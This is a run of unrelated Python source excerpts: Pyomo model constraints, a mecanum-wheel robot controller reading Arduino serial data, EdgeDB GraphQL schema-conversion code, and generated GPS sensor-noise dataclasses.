m.c5275 = Constraint(expr= m.x6680 - 380*m.b7104 <= 0)
m.c5276 = Constraint(expr= m.x6681 - 380*m.b7105 <= 0)
m.c5277 = Constraint(expr= m.x6666 - 385*m.b7094 <= 0)
m.c5278 = Constraint(expr= m.x6667 - 385*m.b7098 <= 0)
m.c5279 = Constraint(expr= m.x6668 - 385*m.b7097 <= 0)
m.c5280 = Constraint(expr= m.x6669 - 385*m.b7098 <= 0)
m.c5281 = Constraint(expr= m.x6670 - 385*m.b7102 <= 0)
m.c5282 = Constraint(expr= m.x6671 - 385*m.b7101 <= 0)
m.c5283 = Constraint(expr= m.x6672 - 385*m.b7102 <= 0)
m.c5284 = Constraint(expr= m.x6673 - 385*m.b7100 <= 0)
m.c5285 = Constraint(expr= m.x6674 - 385*m.b7101 <= 0)
m.c5286 = Constraint(expr= m.x6675 - 385*m.b7102 <= 0)
m.c5287 = Constraint(expr= m.x6676 - 385*m.b7105 <= 0)
m.c5288 = Constraint(expr= m.x6677 - 385*m.b7104 <= 0)
m.c5289 = Constraint(expr= m.x6678 - 385*m.b7105 <= 0)
m.c5290 = Constraint(expr= m.x6679 - 385*m.b7103 <= 0)
m.c5291 = Constraint(expr= m.x6680 - 385*m.b7104 <= 0)
m.c5292 = Constraint(expr= m.x6681 - 385*m.b7105 <= 0)
m.c5293 = Constraint(expr= m.x6666 - 400*m.b7094 <= 0)
m.c5294 = Constraint(expr= m.x6667 - 400*m.b7098 <= 0)
m.c5295 = Constraint(expr= m.x6668 - 400*m.b7097 <= 0)
m.c5296 = Constraint(expr= m.x6669 - 400*m.b7098 <= 0)
m.c5297 = Constraint(expr= m.x6670 - 400*m.b7102 <= 0)
m.c5298 = Constraint(expr= m.x6671 - 400*m.b7101 <= 0)
m.c5299 = Constraint(expr= m.x6672 - 400*m.b7102 <= 0)
m.c5300 = Constraint(expr= m.x6673 - 400*m.b7100 <= 0)
m.c5301 = Constraint(expr= m.x6674 - 400*m.b7101 <= 0)
m.c5302 = Constraint(expr= m.x6675 - 400*m.b7102 <= 0)
m.c5303 = Constraint(expr= m.x6676 - 400*m.b7105 <= 0)
m.c5304 = Constraint(expr= m.x6677 - 400*m.b7104 <= 0)
m.c5305 = Constraint(expr= m.x6678 - 400*m.b7105 <= 0)
m.c5306 = Constraint(expr= m.x6679 - 400*m.b7103 <= 0)
m.c5307 = Constraint(expr= m.x6680 - 400*m.b7104 <= 0)
m.c5308 = Constraint(expr= m.x6681 - 400*m.b7105 <= 0)
m.c5309 = Constraint(expr= m.x6698 - 405*m.b7118 <= 0)
m.c5310 = Constraint(expr= m.x6699 - 405*m.b7122 <= 0)
m.c5311 | |
+ hex(self.us_ok) + ', bat_vol_x100 = ' + '{:=4}'.format(int(self.bat_vol_x100)))
print('ps2_button = ' + hex(self.ps2_button) + ', ' + '{:=3}'.format(int(self.ps2_analogRX)) + ', ' + '{:=3}'.format(int(self.ps2_analogRY)) + ', ' + '{:=3}'.format(int(self.ps2_analogLX)) + ', ' + '{:=3}'.format(int(self.ps2_analogLY)))
print('interval_MEGA = ' + '{:=6}'.format(int(self.interval_MEGA)))
def print_wrk(self):
print('arduino.mode = ' + str(self.mode))
print('dx_cmd = {:=+4}, {:=+4}, {:=+4}'.format(self.dx_cmd[0], self.dx_cmd[1], self.dx_cmd[2]))
print('omega_cmd = {:=+4}, {:=+4}, {:=+4}, {:=+4}'.format(self.omega_cmd[0], self.omega_cmd[1], self.omega_cmd[2], self.omega_cmd[3]))
print('omega_cmd_x10 = {:=+4}, {:=+4}, {:=+4}, {:=+4}'.format(self.omega_cmd_x10[0], self.omega_cmd_x10[1], self.omega_cmd_x10[2], self.omega_cmd_x10[3]))
def cmd_wrk(self, x, y, th):
self.sample_num_host += 1
if self.sample_num_host <= self.sample_num_ll: self.sample_num_host = self.sample_num_ll
elif self.sample_num_host >= self.sample_num_ul: self.sample_num_host = 0
if x <= self.x_ll[0]: x = self.x_ll[0]
elif x >= self.x_ul[0]: x = self.x_ul[0]
if y <= self.x_ll[1]: y = self.x_ll[1]
elif y >= self.x_ul[1]: y = self.x_ul[1]
if th <= self.x_ll[2]: th = self.x_ll[2]
elif th >= self.x_ul[2]: th = self.x_ul[2]
# print('wrk,' + '{:0=3}'.format(int(self.sample_num_host)) + ',' + '{:0=+5}'.format(int(x)) + ',' + '{:0=+5}'.format(int(y)) + ',' + '{:0=+5}'.format(int(th)) + ',end')
# self.con.write('wrk,{:0=3}'.format(int(self.sample_num_host)) + ',' + '{:0=+5}'.format(int(x)) + ',' + '{:0=+5}'.format(int(y)) + ',' + '{:0=+5}'.format(int(th)) + ',end')
def apply_filter(self):
self.mx_lpf = self.mx_lpf + self.g_mag * self.dt * (self.mx - self.mx_lpf)
self.my_lpf = self.my_lpf + self.g_mag * self.dt * (self.my - self.my_lpf)
self.gz_hpf_tmp += self.dt * self.gz_hpf
self.gz_hpf = self.gz - self.g_gz * self.gz_hpf_tmp
self.int_gz_hpf += self.dt * self.gz_hpf
def odometry_update_res(self):
omega_rad = np.array(
[ self.omega_res_x10[0] * self.pi / 1800.0
, self.omega_res_x10[1] * self.pi / 1800.0
, self.omega_res_x10[2] * self.pi / 1800.0
, self.omega_res_x10[3] * self.pi / 1800.0
])
self.dx_res = np.dot(self.J_inv_plus, omega_rad)
self.x_res[0] += self.dt * (self.dx_res[0] * cos(self.x_res[2]) - self.dx_res[1] * sin(self.x_res[2]))
self.x_res[1] += self.dt * (self.dx_res[0] * sin(self.x_res[2]) + self.dx_res[1] * cos(self.x_res[2]))
self.x_res_[2] = atan2(self.my_lpf - self.my_offset, self.mx_lpf - self.mx_offset)
# self.x_res[2] = atan2(self.my_lpf - self.my_offset, self.mx_lpf - self.mx_offset) + self.int_gz_hpf
self.x_res[2] += self.dt * (self.dx_res[2])
def odometry_update_cmd(self): # Not in use it cannnot estimate pose enough precision
self.x_res2[0] += self.dt * (self.dx_cmd_x10[0] / 10.0 / 1000.0 * cos(self.x_res[2]) - self.dx_cmd_x10[1] / 10.0 / 1000.0 * sin(self.x_res[2]))
self.x_res2[1] += self.dt * (self.dx_cmd_x10[0] / 10.0 / 1000.0 * sin(self.x_res[2]) + self.dx_cmd_x10[1] / 10.0 / 1000.0 * sin(self.x_res[2]))
self.x_res2[2] += self.dt * (self.dx_cmd_x10[2] / 10.0 * self.pi / 180.0)
def print_odom(self):
print('OdomRes : {:=7.2f}, {:=7.2f}, {:=7.3f}, Battery = {:=2.2f}'.format(self.x_res[0], self.x_res[1], self.x_res[2]/3.141592*180.0, self.bat_vol))
# print('OdomCmd : {:=7.2f}, {:=7.2f}, {:=7.3f}'.format(self.x_res2[0], self.x_res2[1], self.x_res2[2]))
def fwd_kine(self):
self.dx_res[0] = 0
self.dx_res[1] = 0
self.dx_res[2] = 0
def rate_limit_work(self):
for i in range(0, len(self.dx_cmd)):
if(self.dx_cmd[i] > self.dx_cmd_rl[i] + self.dx_rate_limit[i]): self.dx_cmd_rl[i] += self.dx_rate_limit[i];
elif (self.dx_cmd[i] < self.dx_cmd_rl[i] - self.dx_rate_limit[i]): self.dx_cmd_rl[i] -= self.dx_rate_limit[i];
else: self.dx_cmd_rl[i] = self.dx_cmd[i];
def inv_kine(self):
self.omega_cmd[0] = (self.dx_cmd_rl[0] + self.dx_cmd_rl[1] + (self.base_width + self.base_length) / 1000.0 / 2.0 * self.dx_cmd_rl[2]) / (self.wheel_radius / 1000.0);
self.omega_cmd[1] = (self.dx_cmd_rl[0] - self.dx_cmd_rl[1] - (self.base_width + self.base_length) / 1000.0 / 2.0 * self.dx_cmd_rl[2]) / (self.wheel_radius / 1000.0);
self.omega_cmd[2] = (self.dx_cmd_rl[0] - self.dx_cmd_rl[1] + (self.base_width + self.base_length) / 1000.0 / 2.0 * self.dx_cmd_rl[2]) / (self.wheel_radius / 1000.0);
self.omega_cmd[3] = (self.dx_cmd_rl[0] + self.dx_cmd_rl[1] - (self.base_width + self.base_length) / 1000.0 / 2.0 * self.dx_cmd_rl[2]) / (self.wheel_radius / 1000.0);
def command_motor_node(self):
self.omega_cmd_x10[0] = int(self.omega_cmd[0] / 3.141592 * 1800)
self.omega_cmd_x10[1] = int(self.omega_cmd[1] / 3.141592 * 1800)
self.omega_cmd_x10[2] = int(self.omega_cmd[2] / 3.141592 * 1800)
self.omega_cmd_x10[3] = int(self.omega_cmd[3] / 3.141592 * 1800)
self.conFM.write('vel,{:0=3}'.format(int(self.sample_num_host)) + ',' + '{:0=+5}'.format(int(self.ws_dir[0] * self.omega_cmd_x10[0])) + ',' + '{:0=+5}'.format(int(self.ws_dir[1] * self.omega_cmd_x10[1])) + ',end')
self.conRM.write('vel,{:0=3}'.format(int(self.sample_num_host)) + ',' + '{:0=+5}'.format(int(self.ws_dir[2] * self.omega_cmd_x10[2])) + ',' + '{:0=+5}'.format(int(self.ws_dir[3] * self.omega_cmd_x10[3])) + ',end')
# print('vel,{:0=3}'.format(int(self.sample_num_host)) + ',' + '{:0=+5}'.format(int(self.ws_dir[0] * self.omega_cmd_x10[0])) + ',' + '{:0=+5}'.format(int(self.ws_dir[1] * self.omega_cmd_x10[1])) + ',end')
# print('vel,{:0=3}'.format(int(self.sample_num_host)) + ',' + '{:0=+5}'.format(int(self.ws_dir[2] * self.omega_cmd_x10[2])) + ',' + '{:0=+5}'.format(int(self.ws_dir[3] * self.omega_cmd_x10[3])) + ',end')
def readMEGA(self):
sample_num_node_MEGA = 0
ir_hex = 0
ax = 0
ay = 0
az = 0
gx = 0
gy = 0
gz = 0
mx = 0
my = 0
mz = 0
temp = 0
us_dist = np.array([0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0])
us_ok = 0
bat_vol_x100 = 0
ps2_button = 0
ps2_analogRX = 0
ps2_analogRY = 0
ps2_analogLX = 0
ps2_analogLY = 0
interval_MEGA = 0
tmp_str = self.conMEGA.read(self.conMEGA.inWaiting()) # シリアルのバッファー内のデータを取得
tmp_list = (self.before_nokoriMEGA + tmp_str).split('\n') # 前回サンプル残りと今回サンプルをつなぎ合わせて改行で分割
if len(tmp_list) >= 2:
for i in range(0, len(tmp_list) - 1):
tmp_val_list = tmp_list[i].split(',')
sample_err = 0
if len(tmp_val_list) == 28:
if is_int(tmp_val_list[0]): sample_num_node_MEGA = int(tmp_val_list[0])
else: sample_err = 1
if is_hex(tmp_val_list[1]): ir_hex = int(tmp_val_list[1], 16)
else: sample_err = 2
if is_int(tmp_val_list[2]): ax = int(tmp_val_list[2])
else: sample_err = 3
if is_int(tmp_val_list[3]): ay = int(tmp_val_list[3])
else: sample_err = 4
if is_int(tmp_val_list[4]): az = int(tmp_val_list[4])
else: sample_err = 5
if is_int(tmp_val_list[5]): gx = int(tmp_val_list[5])
else: sample_err = 6
if is_int(tmp_val_list[6]): gy = int(tmp_val_list[6])
else: sample_err = 7
if is_int(tmp_val_list[7]): gz = int(tmp_val_list[7])
else: sample_err = 8
if is_int(tmp_val_list[8]): mx = int(tmp_val_list[8])
else: sample_err = 9
if is_int(tmp_val_list[9]): my = int(tmp_val_list[9])
else: sample_err = 10
if is_int(tmp_val_list[10]): mz = int(tmp_val_list[10])
else: sample_err = 11
if is_int(tmp_val_list[11]): temp = int(tmp_val_list[11])
else: sample_err = 12
if is_int(tmp_val_list[12]): us_dist[0] = float(tmp_val_list[12])
else: sample_err = 13
if is_int(tmp_val_list[13]): us_dist[1] = float(tmp_val_list[13])
else: sample_err = 14
if is_int(tmp_val_list[14]): us_dist[2] = float(tmp_val_list[14])
else: sample_err = 15
if is_int(tmp_val_list[15]): us_dist[3] = float(tmp_val_list[15])
else: sample_err = 16
if is_int(tmp_val_list[16]): us_dist[4] = float(tmp_val_list[16])
else: sample_err = 17
if is_int(tmp_val_list[17]): us_dist[5] = float(tmp_val_list[17])
else: sample_err = 18
if is_int(tmp_val_list[18]): us_dist[6] = float(tmp_val_list[18])
else: sample_err = 19
if is_int(tmp_val_list[19]): us_dist[7] = float(tmp_val_list[19])
else: sample_err = 20
if is_hex(tmp_val_list[20]): us_ok = int(tmp_val_list[20], 16)
else: sample_err = 21
if is_int(tmp_val_list[21]): bat_vol_x100 = int(tmp_val_list[21])
else: sample_err = 22
if is_hex(tmp_val_list[22]): ps2_button = int(tmp_val_list[22], 16)
else: sample_err = 23
if is_int(tmp_val_list[23]): ps2_analogRX = int(tmp_val_list[23])
else: sample_err = 24
if is_int(tmp_val_list[24]): ps2_analogRY = int(tmp_val_list[24])
else: sample_err = 25
if is_int(tmp_val_list[25]): ps2_analogLX = int(tmp_val_list[25])
else: sample_err = 26
if is_int(tmp_val_list[26]): ps2_analogLY = int(tmp_val_list[26])
else: sample_err = 27
if is_int(tmp_val_list[27]): interval_MEGA = int(tmp_val_list[27])
else: sample_err = 28
else:
sample_err = 99
# If error not occured, put the data to class
if sample_err == 0:
self.sample_num_node_MEGA = sample_num_node_MEGA
self.ir_hex = ir_hex
self.ax = ax
self.ay = ay
self.az = az
self.gx = self.gc * gx
self.gy = self.gc * gy
self.gz = self.gc * gz
self.mx = mx
self.my = my
self.mz = mz
self.temp = temp
self.us_dist[0] = us_dist[0]
self.us_dist[1] = us_dist[1]
self.us_dist[2] = us_dist[2]
self.us_dist[3] = us_dist[3]
self.us_dist[4] = us_dist[4]
self.us_dist[5] = us_dist[5]
self.us_dist[6] = us_dist[6]
self.us_dist[7] = us_dist[7]
self.us_ok = us_ok
self.bat_vol_x100 = bat_vol_x100
self.bat_vol = self.bat_vol_x100 / 100.0
self.ps2_button = ps2_button
self.ps2_analogRX = ps2_analogRX
self.ps2_analogRY = ps2_analogRY
self.ps2_analogLX = ps2_analogLX
self.ps2_analogLY = ps2_analogLY
self.interval_MEGA = interval_MEGA
else:
print("Error in read MEGA: " + str(sample_err) + ": ")
print(tmp_list[i])
self.before_nokoriMEGA = tmp_list[len(tmp_list) - 1] # 次ループに回す余りを保存
def readFM(self):
# Initialize variables
err_flag = 0
sample_num_node_FM = 0
cnt_now_0 = 0
cnt_now_1 = 0
omega_res_x10_0 = 0
omega_res_x10_1 = 0
omega_cmd_x10_0 = 0
omega_cmd_x10_1 = 0
vout_0 = 0
vout_1 = 0
interval = 0
# Read serial data & Put it to class
tmp_str = self.conFM.read(self.conFM.inWaiting()) # Read serial data
tmp_list = (self.before_nokoriFM + tmp_str).split('\n') # Connect previous rest sample and this sample -> split by new line char
if len(tmp_list) >= 2:
for i in range(0, len(tmp_list) - 1):
tmp_val_list = tmp_list[i].split(',')
sample_err = 0
if len(tmp_val_list) == 10:
if is_int(tmp_val_list[0]): sample_num_node_FM = int(tmp_val_list[0])
else: sample_err = 1
if is_int(tmp_val_list[1]): cnt_now_0 = int(tmp_val_list[1])
else: sample_err = 1
if is_int(tmp_val_list[2]): cnt_now_1 = int(tmp_val_list[2])
else: sample_err = 1
if is_int(tmp_val_list[3]): omega_res_x10_0 = int(tmp_val_list[3])
else: sample_err = 1
if is_int(tmp_val_list[4]): omega_res_x10_1 = int(tmp_val_list[4])
else: sample_err = 1
if is_int(tmp_val_list[5]): omega_cmd_x10_0 = int(tmp_val_list[5])
else: sample_err = 1
if is_int(tmp_val_list[6]): omega_cmd_x10_1 = int(tmp_val_list[6])
else: sample_err = 1
if is_int(tmp_val_list[7]): vout_0 = int(tmp_val_list[7])
else: sample_err = 1
if is_int(tmp_val_list[8]): vout_1 = int(tmp_val_list[8])
else: sample_err = 1
if is_int(tmp_val_list[9]): interval = int(tmp_val_list[9])
else: sample_err = 1
else:
err_flag = 1
# If error | |
'', f'get_input_name {name=}'
return f'{module}__{inputtype}{shortname}'
else:
return f'{inputtype}{name}'
def gql_to_edb_name(self, name: str) -> str:
'''Convert the GraphQL field name into an EdgeDB type/view name.'''
if '__' in name:
return name.replace('__', '::', 1)
else:
return name
def _get_description(self, edb_type: s_types.Type) -> Optional[str]:
description_anno = edb_type.get_annotations(self.edb_schema).get(
self.edb_schema, s_name.QualName('std', 'description'), None)
if description_anno is not None:
return description_anno.get_value(self.edb_schema)
return None
def _convert_edb_type(
self,
edb_target: s_types.Type,
) -> Optional[GraphQLOutputType]:
target: Optional[GraphQLOutputType] = None
# only arrays can be validly wrapped, other containers don't
# produce a valid graphql type
if isinstance(edb_target, s_types.Array):
subtype = edb_target.get_subtypes(self.edb_schema)[0]
if str(subtype.get_name(self.edb_schema)) == 'std::json':
# cannot expose arrays of JSON
return None
el_type = self._convert_edb_type(subtype)
if el_type is None:
# we can't expose an array of unexposable type
return el_type
else:
target = GraphQLList(GraphQLNonNull(el_type))
elif edb_target.is_view(self.edb_schema):
tname = edb_target.get_name(self.edb_schema)
assert isinstance(tname, s_name.QualName)
target = self._gql_objtypes.get(tname)
elif isinstance(edb_target, s_objtypes.ObjectType):
target = self._gql_interfaces.get(
edb_target.get_name(self.edb_schema),
self._gql_objtypes.get(edb_target.get_name(self.edb_schema))
)
elif (
isinstance(edb_target, s_scalars.ScalarType)
and edb_target.is_enum(self.edb_schema)
):
name = self.get_gql_name(edb_target.get_name(self.edb_schema))
if name in self._gql_enums:
target = self._gql_enums.get(name)
elif edb_target.is_tuple(self.edb_schema):
edb_typename = edb_target.get_verbosename(self.edb_schema)
raise g_errors.GraphQLCoreError(
f"Could not convert {edb_typename} to a GraphQL type.")
elif isinstance(edb_target, s_types.InheritingType):
base_target = edb_target.get_topmost_concrete_base(self.edb_schema)
bt_name = base_target.get_name(self.edb_schema)
try:
target = EDB_TO_GQL_SCALARS_MAP[str(bt_name)]
except KeyError:
# this is the scalar base case, where all potentially
# unrecognized scalars should end up
edb_typename = edb_target.get_verbosename(self.edb_schema)
raise g_errors.GraphQLCoreError(
f"could not convert {edb_typename!r} type to"
f" a GraphQL type")
else:
raise AssertionError(f'unexpected schema object: {edb_target!r}')
return target
def _get_target(
self,
ptr: s_pointers.Pointer,
) -> Optional[GraphQLOutputType]:
edb_target = ptr.get_target(self.edb_schema)
if edb_target is None:
raise AssertionError(f'unexpected abstract pointer: {ptr!r}')
target = self._convert_edb_type(edb_target)
if target is not None:
# figure out any additional wrappers due to cardinality
# and required flags
target = self._wrap_output_type(ptr, target)
return target
def _wrap_output_type(
self,
ptr: s_pointers.Pointer,
target: GraphQLOutputType,
*,
ignore_required: bool = False,
) -> GraphQLOutputType:
# figure out any additional wrappers due to cardinality
# and required flags
if not ptr.singular(self.edb_schema):
target = GraphQLList(GraphQLNonNull(target))
if not ignore_required:
# for input values having a default cancels out being required
if ptr.get_required(self.edb_schema):
target = GraphQLNonNull(target)
return target
def _wrap_input_type(
self,
ptr: s_pointers.Pointer,
target: GraphQLInputType,
*,
ignore_required: bool = False,
) -> GraphQLInputType:
# figure out any additional wrappers due to cardinality
# and required flags
if not ptr.singular(self.edb_schema):
target = GraphQLList(GraphQLNonNull(target))
if not ignore_required:
if (
ptr.get_required(self.edb_schema)
and ptr.get_default(self.edb_schema) is None
):
target = GraphQLNonNull(target)
return target
def _get_query_args(
self,
typename: s_name.QualName,
) -> Dict[str, GraphQLArgument]:
return {
'filter': GraphQLArgument(self._gql_inobjtypes[str(typename)]),
'order': GraphQLArgument(self._gql_ordertypes[str(typename)]),
'first': GraphQLArgument(GraphQLInt),
'last': GraphQLArgument(GraphQLInt),
# before and after are supposed to be opaque values
# serialized to string
'before': GraphQLArgument(GraphQLString),
'after': GraphQLArgument(GraphQLString),
}
def _get_insert_args(
self,
typename: s_name.QualName,
) -> Dict[str, GraphQLArgument]:
# The data can only be a specific non-interface type, if no
# such type exists, skip it as we cannot accept unambiguous
# data input. It's still possible to just select some existing
# data.
intype = self._gql_inobjtypes.get(f'Insert{typename}')
if intype is None:
return {}
return {
'data': GraphQLArgument(
GraphQLNonNull(GraphQLList(GraphQLNonNull(intype)))),
}
def _get_update_args(
self,
typename: s_name.QualName,
) -> Dict[str, GraphQLArgument]:
# some types have no updates
uptype = self._gql_inobjtypes.get(f'Update{typename}')
if uptype is None:
return {}
# the update args are same as for query + data
args = self._get_query_args(typename)
args['data'] = GraphQLArgument(GraphQLNonNull(uptype))
return args
def get_fields(
self,
typename: s_name.QualName,
) -> Dict[str, GraphQLField]:
fields = {}
if str(typename) == 'stdgraphql::Query':
# The fields here will come from abstract types and aliases.
queryable: List[Tuple[s_name.QualName, GraphQLNamedType]] = []
queryable.extend(self._gql_interfaces.items())
queryable.extend(self._gql_objtypes_from_alias.items())
queryable.sort(key=lambda x: x[1].name)
for name, gqliface in queryable:
# '_edb' prefix indicates an internally generated type
# (e.g. nested aliased type), which should not be
# exposed as a top-level query option.
if name in TOP_LEVEL_TYPES or gqliface.name.startswith('_edb'):
continue
fields[gqliface.name] = GraphQLField(
GraphQLList(GraphQLNonNull(gqliface)),
args=self._get_query_args(name),
)
elif str(typename) == 'stdgraphql::Mutation':
for name, gqltype in sorted(self._gql_objtypes.items(),
key=lambda x: x[1].name):
# '_edb' prefix indicates an internally generated type
# (e.g. nested aliased type), which should not be
# exposed as a top-level mutation option.
if name in TOP_LEVEL_TYPES or gqltype.name.startswith('_edb'):
continue
gname = self.get_gql_name(name)
fields[f'delete_{gname}'] = GraphQLField(
GraphQLList(GraphQLNonNull(gqltype)),
args=self._get_query_args(name),
)
args = self._get_insert_args(name)
if args:
fields[f'insert_{gname}'] = GraphQLField(
GraphQLList(GraphQLNonNull(gqltype)),
args=args,
)
for name, gqliface in sorted(self._gql_interfaces.items(),
key=lambda x: x[1].name):
if (name in TOP_LEVEL_TYPES or
gqliface.name.startswith('_edb') or
f'Update{name}' not in self._gql_inobjtypes):
continue
gname = self.get_gql_name(name)
args = self._get_update_args(name)
if args:
fields[f'update_{gname}'] = GraphQLField(
GraphQLList(GraphQLNonNull(gqliface)),
args=args,
)
else:
edb_type = self.edb_schema.get(
typename,
type=s_objtypes.ObjectType,
)
pointers = edb_type.get_pointers(self.edb_schema)
for unqual_pn, ptr in sorted(pointers.items(self.edb_schema)):
pn = str(unqual_pn)
if pn == '__type__':
continue
tgt = ptr.get_target(self.edb_schema)
assert tgt is not None
# Aliased types ignore their ancestors in order to
# allow all their fields appear properly in the
# filters.
if not tgt.is_view(self.edb_schema):
# We want to look at the pointer lineage because that
# will be reflected into GraphQL interface that is
# being extended and the type cannot be changed.
lineage = s_objects.compute_lineage(self.edb_schema, ptr)
# We want the first non-generic ancestor of this
# pointer as its target type will dictate the target
# types of all its derived pointers.
#
# NOTE: We're guaranteed to have a non-generic one
# since we're inspecting the lineage of a pointer
# belonging to an actual type.
for ancestor in reversed(lineage):
if not ancestor.generic(self.edb_schema):
ptr = ancestor
break
target = self._get_target(ptr)
if target is not None:
ptgt = ptr.get_target(self.edb_schema)
if not isinstance(ptgt, s_objtypes.ObjectType):
objargs = None
else:
objargs = self._get_query_args(
ptgt.get_name(self.edb_schema))
fields[pn] = GraphQLField(target, args=objargs)
return fields
def get_filter_fields(
self,
typename: s_name.QualName,
nested: bool = False,
) -> Dict[str, GraphQLInputField]:
selftype = self._gql_inobjtypes[str(typename)]
fields = {}
if not nested:
fields['and'] = GraphQLInputField(
GraphQLList(GraphQLNonNull(selftype)))
fields['or'] = GraphQLInputField(
GraphQLList(GraphQLNonNull(selftype)))
fields['not'] = GraphQLInputField(selftype)
else:
# Always include the 'exists' operation
fields['exists'] = GraphQLInputField(GraphQLBoolean)
edb_type = self.edb_schema.get(typename, type=s_objtypes.ObjectType)
pointers = edb_type.get_pointers(self.edb_schema)
names = sorted(pointers.keys(self.edb_schema))
for unqual_name in names:
name = str(unqual_name)
if name == '__type__':
continue
if name in fields:
raise g_errors.GraphQLCoreError(
f"{name!r} of {typename} clashes with special "
"reserved fields required for GraphQL conversion"
)
ptr = edb_type.getptr(self.edb_schema, unqual_name)
edb_target = ptr.get_target(self.edb_schema)
assert edb_target is not None
if isinstance(edb_target, s_objtypes.ObjectType):
t_name = edb_target.get_name(self.edb_schema)
gql_name = self.get_input_name(
'NestedFilter', self.get_gql_name(t_name))
intype = self._gql_inobjtypes.get(gql_name)
if intype is None:
# construct a nested insert type
intype = GraphQLInputObjectType(
name=gql_name,
fields=partial(self.get_filter_fields, t_name, True),
)
self._gql_inobjtypes[gql_name] = intype
elif not edb_target.is_scalar():
continue
else:
target = self._convert_edb_type(edb_target)
if target is None:
# don't expose this
continue
if isinstance(target, GraphQLNamedType):
intype = self._gql_inobjtypes.get(f'Filter{target.name}')
else:
raise AssertionError(
f'unexpected GraphQL type: {target!r}'
)
if intype:
fields[name] = GraphQLInputField(intype)
return fields
def get_insert_fields(
self,
typename: s_name.QualName,
) -> Dict[str, GraphQLInputField]:
fields = {}
edb_type = self.edb_schema.get(typename, type=s_objtypes.ObjectType)
pointers = edb_type.get_pointers(self.edb_schema)
names = sorted(pointers.keys(self.edb_schema))
for unqual_name in names:
name = str(unqual_name)
if name == '__type__':
continue
ptr = edb_type.getptr(self.edb_schema, unqual_name)
edb_target = ptr.get_target(self.edb_schema)
intype: GraphQLInputType
if isinstance(edb_target, s_objtypes.ObjectType):
typename = edb_target.get_name(self.edb_schema)
inobjtype = self._gql_inobjtypes.get(f'NestedInsert{typename}')
if inobjtype is not None:
intype = inobjtype
else:
# construct a nested insert type
intype = self._make_generic_nested_insert_type(edb_target)
intype = self._wrap_input_type(ptr, intype)
fields[name] = GraphQLInputField(intype)
elif (
isinstance(edb_target, s_scalars.ScalarType)
or isinstance(edb_target, s_types.Array)
):
target = self._convert_edb_type(edb_target)
if target is None:
# don't expose this
continue
if isinstance(target, GraphQLList):
inobjtype = self._gql_inobjtypes.get(
f'Insert{target.of_type.of_type.name}')
assert inobjtype is not None
intype = GraphQLList(GraphQLNonNull(inobjtype))
elif edb_target.is_enum(self.edb_schema):
enum_name = edb_target.get_name(self.edb_schema)
assert isinstance(enum_name, s_name.QualName)
inobjtype = self._gql_inobjtypes.get(f'Insert{enum_name}')
assert inobjtype is not None
intype = inobjtype
elif isinstance(target, GraphQLNamedType):
inobjtype = self._gql_inobjtypes.get(
f'Insert{target.name}')
assert inobjtype is not None
intype = inobjtype
else:
raise AssertionError(
f'unexpected GraphQL type" {target!r}'
)
intype = self._wrap_input_type(ptr, intype)
if intype:
fields[name] = GraphQLInputField(intype)
else:
continue
return fields
def get_update_fields(
self,
typename: s_name.QualName,
) -> Dict[str, GraphQLInputField]:
fields = {}
edb_type = self.edb_schema.get(typename, type=s_objtypes.ObjectType)
pointers = edb_type.get_pointers(self.edb_schema)
names = sorted(pointers.keys(self.edb_schema))
for unqual_name in names:
name = str(unqual_name)
if name == '__type__':
continue
ptr = edb_type.getptr(self.edb_schema, unqual_name)
edb_target = ptr.get_target(self.edb_schema)
if isinstance(edb_target, s_objtypes.ObjectType):
intype = self._gql_inobjtypes.get(
f'UpdateOp{typename}__{name}')
if intype is None:
# the links can only be updated by selecting some
# objects, meaning | |
metadata={
"type": "Element",
"namespace": "",
},
)
velocity_sensing: Optional["Sensor.Gps.VelocitySensing"] = field(
default=None,
metadata={
"type": "Element",
"namespace": "",
},
)
@dataclass
class PositionSensing:
"""
Parameters related to GPS position measurement.
Parameters
----------
horizontal: Noise parameters for horizontal position
measurement, in units of meters.
vertical: Noise parameters for vertical position
measurement, in units of meters.
"""
horizontal: Optional["Sensor.Gps.PositionSensing.Horizontal"] = field(
default=None,
metadata={
"type": "Element",
"namespace": "",
},
)
vertical: Optional["Sensor.Gps.PositionSensing.Vertical"] = field(
default=None,
metadata={
"type": "Element",
"namespace": "",
},
)
@dataclass
class Horizontal:
"""
Noise parameters for horizontal position measurement, in units
of meters.
Parameters
----------
noise: The properties of a sensor noise model.
"""
noise: Optional["Sensor.Gps.PositionSensing.Horizontal.Noise"] = field(
default=None,
metadata={
"type": "Element",
"namespace": "",
"required": True,
},
)
@dataclass
class Noise:
"""
The properties of a sensor noise model.
Parameters
----------
mean: For type "gaussian*", the mean of the Gaussian
distribution from which noise values are drawn.
stddev: For type "gaussian*", the standard deviation
of the Gaussian distribution from which noise
values are drawn.
bias_mean: For type "gaussian*", the mean of the
Gaussian distribution from which bias values are
drawn.
bias_stddev: For type "gaussian*", the standard
deviation of the Gaussian distribution from
which bias values are drawn.
precision: For type "gaussian_quantized", the
precision of output signals. A value of
zero implies infinite precision / no
quantization.
type: The type of noise. Currently supported types
are: "none" (no noise). "gaussian"
(draw noise values independently for each
measurement from a Gaussian distribution).
"gaussian_quantized" ("gaussian" plus
quantization of outputs (ie. rounding))
"""
mean: float = field(
default=0.0,
metadata={
"type": "Element",
"namespace": "",
"required": True,
},
)
stddev: float = field(
default=0.0,
metadata={
"type": "Element",
"namespace": "",
"required": True,
},
)
bias_mean: float = field(
default=0.0,
metadata={
"type": "Element",
"namespace": "",
"required": True,
},
)
bias_stddev: float = field(
default=0.0,
metadata={
"type": "Element",
"namespace": "",
"required": True,
},
)
precision: float = field(
default=0.0,
metadata={
"type": "Element",
"namespace": "",
"required": True,
},
)
type: Optional[str] = field(
default=None,
metadata={
"type": "Attribute",
"required": True,
},
)
@dataclass
class Vertical:
"""
Noise parameters for vertical position measurement, in units of
meters.
Parameters
----------
noise: The properties of a sensor noise model.
"""
noise: Optional["Sensor.Gps.PositionSensing.Vertical.Noise"] = field(
default=None,
metadata={
"type": "Element",
"namespace": "",
"required": True,
},
)
@dataclass
class Noise:
"""
The properties of a sensor noise model.
Parameters
----------
mean: For type "gaussian*", the mean of the Gaussian
distribution from which noise values are drawn.
stddev: For type "gaussian*", the standard deviation
of the Gaussian distribution from which noise
values are drawn.
bias_mean: For type "gaussian*", the mean of the
Gaussian distribution from which bias values are
drawn.
bias_stddev: For type "gaussian*", the standard
deviation of the Gaussian distribution from
which bias values are drawn.
precision: For type "gaussian_quantized", the
precision of output signals. A value of
zero implies infinite precision / no
quantization.
type: The type of noise. Currently supported types
are: "none" (no noise). "gaussian"
(draw noise values independently for each
